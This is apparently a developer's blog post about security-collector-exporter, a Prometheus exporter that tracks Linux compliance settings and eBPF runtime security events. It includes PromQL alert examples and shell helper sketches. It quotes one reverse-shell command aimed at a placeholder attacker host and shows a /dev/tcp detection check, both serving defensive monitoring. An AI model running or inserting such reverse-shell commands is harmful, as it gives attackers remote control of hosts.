From Compliance to Real-Time Defense: The Evolution of security-collector-exporter

The Origin: Compliance Check Hassles

Anyone who runs servers in China knows there is one hurdle you can’t escape: Cybersecurity Level Protection (GB/T 22239-2019, commonly known as “Level Protection 2.0”). Whether you’re Level 3 or Level 2, auditors come asking about these things:

  • Is SSH root login disabled? Are password policies compliant?
  • Is the firewall on? Is SELinux enforcing?
  • Are there expired accounts? What’s the password validity period?
  • Which ports are open? Are there high-risk services running?
  • Are audit logs enabled? How long are they retained?

There are plenty of compliance check tools out there. Search GitHub and you’ll find Golin, EvaluationTools, Linux-Security-Compliance-Check, and others. But they all share one limitation: they run once, produce a report, and stop. You pass the check today; tomorrow someone edits sshd_config, turns off the firewall, or installs a backdoor service, and you’d never know.

The starting point for security-collector-exporter v0.1.0 was simple: turn all these security configuration states into Prometheus metrics, integrate into the existing monitoring system, continuously track, and automatically alert. Not “check once,” but “keep watching.”

It covers the main Linux host-level check items from Level Protection 2.0:

| Compliance Area | Corresponding Metrics | Issues Discovered Through Continuous Monitoring |
| --- | --- | --- |
| Identity Authentication | Password policy, shadow fields | Someone changed password validity, created weak-policy accounts |
| Access Control | SSH config, hosts.allow/deny | Root login re-enabled, access control relaxed |
| Security Audit | auditd status, crontab entries | Audit service stopped, suspicious scheduled tasks added |
| Intrusion Prevention | Firewall status, SELinux mode | Firewall turned off, SELinux set to permissive |
| Network Security | Port list, service status | New high-risk ports opened, unauthorized services started |

Combined with Prometheus alert rules, you can detect configuration changes as they happen. During compliance audits, just pull up the Grafana dashboard—no need to SSH into machines one by one.
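
To make “configuration state as a metric” concrete, here is a minimal sketch in shell. It is not the exporter’s actual implementation: the function name sshd_config_metric is hypothetical, and the label layout simply mirrors the linux_security_sshd_config_info series used in the PromQL examples in this post. It finds the first occurrence of a keyword in an sshd_config-style file and prints one sample in the Prometheus text exposition format.

```shell
#!/bin/sh
# Hypothetical helper, not part of security-collector-exporter.
# Prints one Prometheus text-format sample for a keyword in an
# sshd_config-style file. Simplifications: ignores Include directives,
# Match blocks, and the "Key=value" spelling.
sshd_config_metric() {
    file=$1
    key=$2
    awk -v key="$key" '
        /^[ \t]*#/ { next }                      # skip comment lines
        !found && tolower($1) == tolower(key) {  # keywords are case-insensitive; first value wins
            found = 1
            printf "linux_security_sshd_config_info{info_key=\"%s\",info_value=\"%s\"} 1\n", key, $2
        }
    ' "$file"
}
```

Calling sshd_config_metric /etc/ssh/sshd_config PermitRootLogin prints a single sample line, or nothing when the keyword is not set. Once the value is a label on a scraped series, a change to the file shows up as a change in the time series rather than in next quarter’s report.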

v0.1.0 solved a very specific pain point. But as we used it, we realized: Static configuration checks only cover the “compliance” aspect; the other side of security events is completely invisible.

Blind Spots That Static Checks Can’t See

Here’s a real example. In 2024, there was a Python supply chain attack: a compromised third-party library executed a reverse shell at runtime via execve:

bash
/bin/sh -c "bash -i >& /dev/tcp/attacker-IP/port 0>&1"

This type of attack is completely invisible to traditional security baseline checks:

  • SSH configuration is fine ✓
  • Firewall is on ✓
  • SELinux enforcing ✓
  • Password policy compliant ✓

Your server looks perfectly fine from a compliance perspective, but the attack is already happening.

There are many similar scenarios:

  • Container escape: A process in a pod escalates privileges to the host via kernel vulnerabilities
  • Kernel module backdoor: Someone insmod loads a rootkit kernel module
  • Abnormal network connections: A business container suddenly starts connecting to external suspicious IPs
  • Sensitive file reads: Unauthorized processes reading /etc/shadow or private key files
  • Brute force privilege escalation: Someone repeatedly attempting setuid / capset

These are all runtime events—they happen and are gone; there’s no trace left by the time you run your next baseline check. Linux’s built-in auditd can record some, but it’s designed for traditional hosts, doesn’t understand container and Kubernetes context, drops events under high load, and basically can’t trace process chains across namespaces.

This is where eBPF shines.

eBPF: Kernel-Level Real-Time Security Monitoring

eBPF’s core capability is that small programs attach to hook points in kernel space (tracepoints, kprobes) and aggregate data in kernel maps as events occur. Because not every event has to be copied to user space, overhead stays low.

Tetragon (from the Cilium project) is the best-known open-source project in this direction and is widely adopted for Kubernetes security. One production case: in a 3000-node cluster, Tetragon detected a reverse shell from a supply-chain-compromised Python library, going from the event occurring to pinpointing its source in just 4 minutes. With traditional audit logs, tracing the same event could take a day.

But Tetragon is Kubernetes-oriented, focused on policy enforcement, and takes real effort to deploy and configure. Many scenarios don’t need something that heavy: you might just want to add a layer of security event awareness to your existing Prometheus monitoring system, without a full policy engine.

security-collector-exporter started adding eBPF support from v0.2.0. It’s lighter but very practical:

Five Categories of Real-Time Security Events

text
Process Tracing    → Who's executing what? Did a container spawn a shell?
Network Connections → Who's connecting externally? Any abnormal outbound traffic?
File Access        → Who's reading sensitive files? Who touched /etc/shadow?
Privilege Detection → Someone doing setuid/capset? Success or failure?
Kernel Modules     → Are kernel modules being loaded?
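
As a rough illustration of what the process tracing category makes possible, the sketch below flags a command line that uses bash’s /dev/tcp or /dev/udp redirection, the trick behind the reverse shell shown earlier. The function name is hypothetical and this is not how the exporter classifies events; a plain string match like this is easy to evade and only serves to show the shape of the check.

```shell
#!/bin/sh
# Hypothetical check, not taken from security-collector-exporter.
# Succeeds (exit 0) when the command line contains a /dev/tcp/ or
# /dev/udp/ path, which bash treats as a network redirection.
is_reverse_shell_cmdline() {
    case $1 in
        */dev/tcp/*|*/dev/udp/*) return 0 ;;
        *) return 1 ;;
    esac
}
```

The command line of a live process can be read from /proc/PID/cmdline, where arguments are NUL-separated, so it has to be converted (for example with tr '\0' ' ') before being passed to the function.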

The Static + eBPF Combination

What’s interesting is that when eBPF metrics are combined with static metrics, the effect isn’t 1+1=2, it’s 1+1>2:

promql
# Static metric: Firewall is on ✓
linux_security_firewall_enabled{is_running="true"} == 1

# eBPF metric: But outbound connection attempts spiked (more than 100 in 5 minutes)
increase(security_ebpf_connect_total{direction="out"}[5m]) > 100

# Combined: Firewall compliant + abnormal outbound traffic → possible process bypassing firewall rules

Or:

promql
# Static metric: SSH config compliant
linux_security_sshd_config_info{info_key="PermitRootLogin", info_value="no"} == 1

# eBPF metric: But more than 10 setuid attempts failed in 10 minutes
increase(security_ebpf_privilege_escalation_total{type="setuid", result="failure"}[10m]) > 10

# Combined: SSH hardened but someone is brute-forcing privileges → possible other entry point exploited

Static metrics tell you “is the config correct,” eBPF metrics tell you “what’s actually happening.” Only when combining these two dimensions do you get true security situational awareness.
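
The “Combined” comments in the two examples above describe a correlation without spelling it out. One way to express the first one is a single PromQL expression that joins both conditions on the instance label, sketched below together with a small wrapper around the Prometheus HTTP API. Everything here is an assumption for illustration: the function names, the PROM_URL default, and the premise that both series carry the same instance label because they come from the same scrape target.

```shell
#!/bin/sh
# Hypothetical helpers. PROM_URL is an assumed Prometheus server address.
PROM_URL=${PROM_URL:-http://localhost:9090}

# Firewall reports enabled AND outbound connects spiked on the same instance.
# Comparison operators bind tighter than "and", so no parentheses are needed.
firewall_bypass_query() {
    printf '%s' 'linux_security_firewall_enabled{is_running="true"} == 1 and on(instance) increase(security_ebpf_connect_total{direction="out"}[5m]) > 100'
}

# Sends an instant query to the Prometheus HTTP API and prints the JSON reply.
run_query() {
    curl -fsS --get "$PROM_URL/api/v1/query" --data-urlencode "query=$1"
}
```

Running run_query "$(firewall_bypass_query)" returns only the instances where both conditions hold at once. The same expression could serve as the expr of an alerting rule.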

From v0.1.0 to v0.3.0

text
v0.1.0    Static security configuration collection, 15 metric categories, compliance-focused
v0.2.0    Added eBPF, 5 BPF programs, real-time security event monitoring
v0.3.0    Bug fixes, ARM compatibility, production-grade stability

v0.2.0 was the feature release: all the core eBPF capabilities were in place. But running it in real environments exposed many problems: BPF programs referenced kernel struct fields incorrectly, the UDP kprobes didn’t exist on the target kernels, and version detection on ARM devices could stall the entire collection cycle. v0.3.0 was a day spent fixing these hard issues: switching from PERCPU_ARRAY to PERCPU_HASH to resolve race conditions, adding a PID hash map for process exit classification, rewriting the Aggregator with delta tracking, and adding timeouts and caching to version detection.
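
The “timeouts and caching” fix follows a common pattern: cap how long a slow probe may run, and remember its answer so later collection cycles don’t pay for it again. The sketch below shows the pattern in shell. It is not the exporter’s code; the function name cached_probe and the PROBE_TIMEOUT variable are hypothetical, it assumes the GNU coreutils timeout command, and the cache never expires.

```shell
#!/bin/sh
# Hypothetical helper illustrating "timeout plus cache" for a slow probe.
# Usage: cached_probe CACHE_FILE COMMAND [ARGS...]
PROBE_TIMEOUT=${PROBE_TIMEOUT:-2}   # seconds; assumed default

cached_probe() {
    cache=$1
    shift
    # Serve the cached answer if a previous run already stored one.
    if [ -s "$cache" ]; then
        cat "$cache"
        return 0
    fi
    # Cap the probe's runtime so it cannot stall the caller.
    if out=$(timeout "$PROBE_TIMEOUT" "$@" 2>/dev/null) && [ -n "$out" ]; then
        printf '%s\n' "$out" > "$cache"
        printf '%s\n' "$out"
    else
        # Probe failed or timed out: report a placeholder, cache nothing.
        echo unknown
    fi
}
```

A failed or timed-out probe is deliberately not cached, so the next cycle gets another chance to record a real value.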

v0.3.0 is the first version you can confidently run in production.

Scenario Coverage

A table showing what the tool can now handle:

| Scenario | Static Metrics (v0.1.0) | eBPF Metrics (v0.3.0) |
| --- | --- | --- |
| Level Protection 2.0 compliance checks | ✅ | - |
| SSH/firewall/SELinux config drift detection | ✅ | - |
| Password policy and account lifecycle monitoring | ✅ | - |
| Port and service change tracking | ✅ | - |
| Reverse shell / suspicious process detection | - | ✅ |
| Container anomaly behavior monitoring | - | ✅ |
| Privilege escalation attack detection | - | ✅ |
| Kernel module backdoor detection | - | ✅ |
| Sensitive file unauthorized access | - | ✅ |
| Abnormal outbound connection detection | - | ✅ |
| Security posture scoring | ✅ (combined) | ✅ (combined) |

From “passing compliance checks” to “continuous security monitoring”—same tool, but capabilities have leveled up.

Who It’s For

  • Compliance scenarios: Teams that need to continuously demonstrate security configuration compliance, no more cramming before each audit
  • Ops security teams: Already using Prometheus + Grafana for infrastructure monitoring, want to add a layer of security awareness
  • Container environments: Need to know what’s running in containers, who they’re connecting to, any abnormal behavior
  • Small to medium server management: Don’t need a full SIEM or SOAR platform, but need basic security observability
  • Security research / education: If you want to understand what eBPF can do in security, this is a lightweight implementation you can play with

Quick Start

bash
# Docker one-liner (with eBPF)
docker run -d \
  --name security-exporter \
  --privileged \
  -p 9102:9102 \
  ghcr.io/mickeyzzc/security-collector-exporter:0.3.0 \
  --ebpf.enabled

Without --ebpf.enabled, it runs in pure static collection mode, fully compatible with v0.1.0.
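
To check that the container is serving data, you can scrape it by hand and keep only this exporter’s series. The helper below is a small sketch: the function name is hypothetical, and the two prefixes are simply the ones that appear in the PromQL examples in this post, so other prefixes may exist.

```shell
#!/bin/sh
# Hypothetical helper: keep only this exporter's sample lines from a
# Prometheus text-format scrape read on stdin. HELP/TYPE comment lines
# and metrics with other prefixes are dropped.
security_metrics() {
    grep -E '^(linux_security_|security_ebpf_)'
}
```

For example, curl -fsS http://localhost:9102/metrics | security_metrics, assuming the exporter serves the conventional /metrics path on the port published above. In pure static mode you would expect only linux_security_ lines to appear.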

Project repositories:

If you find it useful, feel free to star, file an issue, or submit a PR.